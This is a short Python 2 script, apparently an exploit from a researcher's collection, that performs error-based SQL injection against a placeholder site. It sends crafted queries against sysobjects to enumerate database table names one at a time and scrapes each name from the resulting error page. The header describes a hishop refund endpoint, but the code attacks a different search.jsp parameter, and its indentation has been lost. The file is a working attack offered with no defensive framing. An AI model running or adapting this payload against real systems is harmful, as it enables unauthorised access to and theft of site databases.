#coding:utf-8
#Author:LSA
#Description:hishop sqli for /user/UserRefundApply?OrderId=
#Date:20190701
import sys
import requests
from bs4 import BeautifulSoup
import re
headers = {
'Cookie': '',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'
}
global tables_name
tables_name = "'XWCMFLOWACTION'"
#print tables_name
def brute_tables(url):
for i in range(0,300):
url = 'http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(' + tables_name + '))%3E0--'
print url
rsp = requests.get(url,headers=headers)
soup = BeautifulSoup(rsp.text,"lxml")
title = soup.p.text
print title
table_name = re.findall(r"'(.*?)'",title)
print table_name
print table_name[0]
global tables_name
tables_name = tables_name + ',\'' + table_name[0] + '\''
print tables_name
def main(url):
brute_tables(url)
if __name__ == '__main__':
url = 'http://www.xxx.com/search/search.jsp?doctitle=100%27%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27%20and%20name%20not%20in%20(' + tables_name + '))%3E0--'
main(url)